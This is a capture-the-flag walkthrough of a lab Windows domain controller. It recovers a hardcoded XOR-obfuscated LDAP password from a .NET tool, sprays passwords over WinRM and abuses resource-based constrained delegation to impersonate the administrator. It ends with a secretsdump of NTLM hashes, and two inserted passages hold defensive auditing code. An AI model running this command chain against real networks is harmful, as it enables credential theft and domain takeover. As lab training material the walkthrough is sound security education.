Basic information

Port scan

Windows domain environment:

$ nmap -sC -sV -Pn 10.10.11.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-07 13:24 CST
Nmap scan report for 10.10.11.174
Host is up (0.31s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-07 05:31:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-time:
| date: 2022-08-07T05:31:46
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 519.35 seconds

SMB 445

SMB lists a few shares:

└─$ smbclient -L 10.10.11.174 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share

support-tools

Some files can be retrieved from support-tools:

└─$ smbclient //10.10.11.174/support-tools -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 21 01:01:06 2022
.. D 0 Sat May 28 19:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 19:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 19:19:55 2022
putty.exe A 1273576 Sat May 28 19:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 19:19:31 2022
UserInfo.exe.zip A 277499 Thu Jul 21 01:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 19:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 19:19:43 2022

4026367 blocks of size 4096. 871743 blocks available
smb: \>

UserInfo

Download UserInfo.exe.zip; it is a .NET executable. Decompiling it directly with dnSpy shows that it is used to query user information over LDAP and that it contains an encrypted password, which is just a simple XOR:

Decrypting it yields the password:

❯ python3
Python 3.10.0 on linux
>>> enc_password = b"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
>>> key = b"armando"
>>> import base64
>>> array = base64.b64decode(enc_password)
>>> array2 = []
>>> for i in range(len(array)):
...     array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))
>>> print("".join(array2))
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
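The REPL session above undoes the scheme by hand. As an added example (not code from the writeup or from UserInfo.exe), the same operation written as a pair of functions makes the point explicit: XOR is its own inverse, so whoever has the binary has the key, and this is obfuscation rather than encryption. The base64 blob, the key "armando" and the constant 223 are taken from the session above; everything else is mine.

```python
import base64

# Values copied from the REPL session above: the base64 blob and key
# literal recovered from UserInfo.exe, and the constant 223.
ENC_PASSWORD = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
CONST = 223


def xor_deobfuscate(enc_b64: str, key: bytes = KEY, const: int = CONST) -> str:
    """Reverse the UserInfo.exe scheme: base64-decode, then XOR every byte
    with the repeating key byte and the fixed constant."""
    data = base64.b64decode(enc_b64)
    raw = bytes(b ^ key[i % len(key)] ^ const for i, b in enumerate(data))
    # chr() in the REPL session maps each byte 1:1 to a code point; latin-1 does the same.
    return raw.decode("latin-1")


def xor_obfuscate(plaintext: str, key: bytes = KEY, const: int = CONST) -> str:
    """The forward direction the binary's author used. XOR is its own inverse,
    so this is the same operation followed by base64; a static key inside the
    executable protects nothing once the file can be read."""
    raw = plaintext.encode("latin-1")
    data = bytes(b ^ key[i % len(key)] ^ const for i, b in enumerate(raw))
    return base64.b64encode(data).decode("ascii")


if __name__ == "__main__":
    print(xor_deobfuscate(ENC_PASSWORD))
```

The mitigation this illustrates is not a better cipher: a service account credential that a client-side tool needs should not ship inside the tool at all (a low-privilege account, a credential vault, or a server-side component that performs the LDAP lookup are the usual answers).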

ldap

Following the LDAP query found in the binary, retrieve information over LDAP:

The info attribute holds a default password:

ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep info:

info: Ironside47pleasure40Watchful

Likewise, collect all usernames over LDAP and spray the password against them; this yields one valid account:

ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt

crackmapexec winrm 10.10.11.174 -u users.txt -p Ironside47pleasure40Watchful

WINRM 10.10.11.174 5985 DC [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)

user flag

Log in with the obtained credentials to get the user flag.

Privilege escalation information

Running BloodHound shows that the support user is in the shared support group, which has GenericAll over the DC.

bloodhound-python -u support -ns 10.10.11.174 -d support.htb -c All

# Starting from the support user we already have, check Group Delegated Object Control in the Analysis tab to get this result

In this situation, RBCD can be used:

RBCD

Using PowerView and Powermad; after uploading and importing the modules, step by step:

Import-Module .\PowerView.ps1
Import-Module .\Powermad.ps1

# Create a new machine account
New-MachineAccount -MachineAccount miao01 -Password $(ConvertTo-SecureString 'miao123456' -AsPlainText -Force) -Verbose
# Get the SID of the account we created
Get-DomainComputer miao01 -Properties objectsid
S-1-5-21-1677581083-3380853377-188903654-5102

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5102)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Modify the target machine's security descriptor
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# Obtain the ticket
impacket-getST support.htb/miao01:miao123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb
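The SDDL string written into msDS-AllowedToActOnBehalfOfOtherIdentity above is the whole delegation grant, and it is also what a defender should be reading back out of every computer object. As an added example (not code from the writeup, PowerView or Powermad), the parser below breaks that exact string into owner, ACE type, the thirteen rights and the trustee SID, and lists every domain principal the descriptor allows to act on the computer's behalf. The abbreviation tables are the standard SDDL ones; the helper and function names are my own.

```python
import re

# SDDL string copied from the Set-DomainObject step above.
SDDL = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5102)"

# Standard SDDL abbreviations (subset relevant to directory objects).
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
             "OA": "ACCESS_ALLOWED_OBJECT", "OD": "ACCESS_DENIED_OBJECT"}
RIGHTS = {
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN",
    "SW": "SELF_WRITE", "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY",
    "DT": "DELETE_TREE", "LO": "LIST_OBJECT", "CR": "CONTROL_ACCESS",
    "SD": "STANDARD_DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GR": "GENERIC_READ",
    "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
WELL_KNOWN = {"BA": "Builtin Administrators", "SY": "Local System", "DA": "Domain Admins"}

_SD_RE = re.compile(
    r"O:(?P<owner>[A-Z]{2}|S-[0-9-]+)(?:G:(?P<group>[A-Z]{2}|S-[0-9-]+))?D:(?P<dacl>.*)"
)


def parse_ace(ace: str) -> dict:
    """Split one ACE 'type;flags;rights;object_guid;inherit_guid;sid'."""
    fields = ace.split(";")
    if len(fields) != 6:
        raise ValueError(f"unexpected ACE layout: {ace!r}")
    ace_type, flags, rights, obj_guid, inh_guid, sid = fields
    if rights.startswith("0x"):          # numeric access mask form
        rights_list = [rights]
    else:                                # two-letter abbreviations, concatenated
        rights_list = [RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                       for i in range(0, len(rights), 2)]
    return {"type": ACE_TYPES.get(ace_type, ace_type), "flags": flags,
            "rights": rights_list, "object_guid": obj_guid,
            "inherit_guid": inh_guid, "sid": sid}


def parse_sddl(sddl: str) -> dict:
    """Parse owner, optional group and the DACL's ACE list from an SDDL string."""
    m = _SD_RE.fullmatch(sddl)
    if not m:
        raise ValueError(f"not an O:..D:.. SDDL string: {sddl!r}")
    dacl = m.group("dacl")
    dacl_flags = re.match(r"[A-Z]*", dacl).group(0)      # e.g. P, AI, AR before the ACEs
    aces = [parse_ace(a) for a in re.findall(r"\(([^)]*)\)", dacl)]
    owner = m.group("owner")
    return {"owner": WELL_KNOWN.get(owner, owner), "group": m.group("group"),
            "dacl_flags": dacl_flags, "aces": aces}


def rid(sid: str) -> int:
    return int(sid.rsplit("-", 1)[1])


def delegated_principals(sddl: str) -> list:
    """Every domain SID (S-1-5-21-...) granted an allow ACE, with its RID.
    Stored in msDS-AllowedToActOnBehalfOfOtherIdentity, each such principal may
    request service tickets to the computer on behalf of other users (S4U2Proxy),
    so any entry here that is not an expected service account is a finding."""
    return [(ace["sid"], rid(ace["sid"]))
            for ace in parse_sddl(sddl)["aces"]
            if ace["type"] == "ACCESS_ALLOWED" and ace["sid"].startswith("S-1-5-21-")]


if __name__ == "__main__":
    for sid, r in delegated_principals(SDDL):
        print(f"{sid} (RID {r}) may act on behalf of other identities")
```

In this descriptor the trustee's RID is 5102, the same RID secretsdump later reports for miao01$: a machine account created minutes earlier, which is exactly the pattern a periodic audit of msDS-AllowedToActOnBehalfOfOtherIdentity (together with alerts on event 4741, computer account created, and on writes to that attribute, event 5136) is meant to surface. The underlying fix is the ACL: no group of ordinary support accounts should hold GenericAll over a domain controller object.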

root flag

Log in with the obtained ticket to get the root flag:

export KRB5CCNAME=administrator.ccache

impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

secretsdump

$ python3 ~/Tools/impacket/examples/secretsdump.py support.htb/administrator@dc.support.htb -just-dc-ntlm -no-pass -k
Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
hernandez.stanley:1107:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
wilson.shelby:1108:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
anderson.damian:1109:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
thomas.raphael:1110:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
levine.leopoldo:1111:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
raven.clifton:1112:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
bardot.mary:1113:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
cromwell.gerard:1114:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
monroe.david:1115:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
west.laura:1116:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
langley.lucy:1117:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
daughtler.mabel:1118:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
stoll.rachelle:1119:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
ford.victoria:1120:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:4c3ab1a0eed84c759a7fc9b18dd8a865:::
MANAGEMENT$:2601:aad3b435b51404eeaad3b435b51404ee:3f99f2f26988d1f348d378e84f86bc58:::
attackersystem$:5101:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
miao01$:5102:aad3b435b51404eeaad3b435b51404ee:5cfc31356a652662201e5072ec5dfd25:::
[*] Cleaning up...

References